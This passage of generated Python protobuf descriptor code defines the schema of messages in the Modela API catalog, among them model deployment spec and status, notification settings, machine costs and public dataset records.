      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='region', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.region', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='costPerMinute', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.costPerMinute', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='costSpot', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.MachineClassCost.costSpot', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3808,
  serialized_end=3993,
)
# Generated protobuf Descriptor for catalog.v1alpha1.Measurement:
# a (metric: string, value: double) pair. type=1 is TYPE_DOUBLE.
_MEASUREMENT = _descriptor.Descriptor(
  name='Measurement',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metric', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement.metric', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='value', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.Measurement.value', index=1,
      number=2, type=1, cpp_type=5, label=1,
      has_default_value=False, default_value=float(0),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=3995,
  serialized_end=4039,
)
# Generated protobuf Descriptor for catalog.v1alpha1.ModelDeploymentSpec.
# Strings: modelName, modelVersion, trafficSelector; int32: maxTraffic,
# traffic; bools (type=8): canary, shadow, released, deployed, mountTar;
# repeated string (label=3): canaryMetrics.
_MODELDEPLOYMENTSPEC = _descriptor.Descriptor(
  name='ModelDeploymentSpec',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='modelName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.modelName', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='modelVersion', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.modelVersion', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='maxTraffic', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.maxTraffic', index=2,
      number=3, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='traffic', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.traffic', index=3,
      number=4, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='canary', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.canary', index=4,
      number=5, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='shadow', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.shadow', index=5,
      number=6, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='released', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.released', index=6,
      number=7, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='deployed', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.deployed', index=7,
      number=8, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='mountTar', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.mountTar', index=8,
      number=9, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='trafficSelector', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.trafficSelector', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='canaryMetrics', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentSpec.canaryMetrics', index=10,
      number=11, type=9, cpp_type=9, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=4042,
  serialized_end=4275,
)
# Generated protobuf Descriptor for catalog.v1alpha1.ModelDeploymentStatus.
# Strings: imageName, hpaName, lastFailure, phase, trainingDatasetName,
# approvedBy; doubles: current95, current99; int32: dailyPredictionAvg;
# message-typed (type=11, resolved elsewhere): deploymentRef, serviceRef,
# lastPredictionTime, deployedAt, releasedAt, approvedAt.
_MODELDEPLOYMENTSTATUS = _descriptor.Descriptor(
  name='ModelDeploymentStatus',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='imageName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.imageName', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='deploymentRef', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.deploymentRef', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='serviceRef', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.serviceRef', index=2,
      number=3, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='hpaName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.hpaName', index=3,
      number=4, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='current95', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.current95', index=4,
      number=5, type=1, cpp_type=5, label=1,
      has_default_value=False, default_value=float(0),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='current99', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.current99', index=5,
      number=6, type=1, cpp_type=5, label=1,
      has_default_value=False, default_value=float(0),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='lastPredictionTime', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.lastPredictionTime', index=6,
      number=7, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='dailyPredictionAvg', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.dailyPredictionAvg', index=7,
      number=8, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='lastFailure', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.lastFailure', index=8,
      number=9, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='phase', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.phase', index=9,
      number=10, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='deployedAt', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.deployedAt', index=10,
      number=11, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='releasedAt', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.releasedAt', index=11,
      number=12, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='trainingDatasetName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.trainingDatasetName', index=12,
      number=13, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='approvedBy', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.approvedBy', index=13,
      number=14, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='approvedAt', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.ModelDeploymentStatus.approvedAt', index=14,
      number=15, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=4278,
  serialized_end=4869,
)
# Generated protobuf Descriptor for the synthesized key/value entry message
# of NotificationSpec.selector (a proto map field). serialized_options
# b'8\001' encodes MessageOptions.map_entry=true (field 7, varint 1).
_NOTIFICATIONSPEC_SELECTORENTRY = _descriptor.Descriptor(
  name='SelectorEntry',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='key', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry.key', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='value', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.SelectorEntry.value', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=b'8\001',
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=5095,
  serialized_end=5142,
)
# Generated protobuf Descriptor for catalog.v1alpha1.NotificationSpec.
# Bools: onError, onSuccess; int32: errorTTL, successTTL; string:
# notifierName; selector is a map<string,string> represented as the
# repeated nested SelectorEntry message declared above.
_NOTIFICATIONSPEC = _descriptor.Descriptor(
  name='NotificationSpec',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='onError', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.onError', index=0,
      number=1, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='errorTTL', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.errorTTL', index=1,
      number=2, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='onSuccess', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.onSuccess', index=2,
      number=3, type=8, cpp_type=7, label=1,
      has_default_value=False, default_value=False,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='successTTL', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.successTTL', index=3,
      number=4, type=5, cpp_type=1, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='notifierName', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.notifierName', index=4,
      number=5, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='selector', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.NotificationSpec.selector', index=5,
      number=6, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[_NOTIFICATIONSPEC_SELECTORENTRY, ],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=4872,
  serialized_end=5142,
)
# Generated protobuf Descriptor for catalog.v1alpha1.PRCurve:
# a single repeated message field `values` (type resolved elsewhere in file).
_PRCURVE = _descriptor.Descriptor(
  name='PRCurve',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PRCurve',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='values', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PRCurve.values', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=5144,
  serialized_end=5238,
)
# Generated protobuf Descriptor for catalog.v1alpha1.PretrainedModel:
# Kubernetes-style resource shape with `metadata` and `spec` message fields.
_PRETRAINEDMODEL = _descriptor.Descriptor(
  name='PretrainedModel',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel.metadata', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModel.spec', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=5241,
  serialized_end=5418,
)
# Generated protobuf Descriptor for catalog.v1alpha1.PretrainedModelList:
# list wrapper with `metadata` (message) and repeated `items` (message).
_PRETRAINEDMODELLIST = _descriptor.Descriptor(
  name='PretrainedModelList',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList.metadata', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelList.items', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=5421,
  serialized_end=5597,
)
# Generated protobuf Descriptor for catalog.v1alpha1.PretrainedModelSpec:
# a single optional string field `image`.
_PRETRAINEDMODELSPEC = _descriptor.Descriptor(
  name='PretrainedModelSpec',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='image', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PretrainedModelSpec.image', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=5599,
  serialized_end=5635,
)
# Generated protobuf Descriptor for catalog.v1alpha1.PublicDataset:
# Kubernetes-style resource shape with `metadata` and `spec` message fields.
_PUBLICDATASET = _descriptor.Descriptor(
  name='PublicDataset',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset.metadata', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='spec', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDataset.spec', index=1,
      number=2, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=5638,
  serialized_end=5811,
)
# Generated protobuf Descriptor for catalog.v1alpha1.PublicDatasetList:
# list wrapper with `metadata` (message) and repeated `items` (message).
_PUBLICDATASETLIST = _descriptor.Descriptor(
  name='PublicDatasetList',
  full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='metadata', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList.metadata', index=0,
      number=1, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='items', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetList.items', index=1,
      number=2, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR,  create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto2',
  extension_ranges=[],
  oneofs=[
  ],
  serialized_start=5814,
  serialized_end=5986,
)
_PUBLICDATASETSPEC = _descriptor.Descriptor(
name='PublicDatasetSpec',
full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='url', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.url', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='description', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.description', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='task', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.task', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='openmlID', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.openmlID', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='dataUrl', full_name='github.com.metaprov.modelaapi.pkg.apis.catalog.v1alpha1.PublicDatasetSpec.dataUrl', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
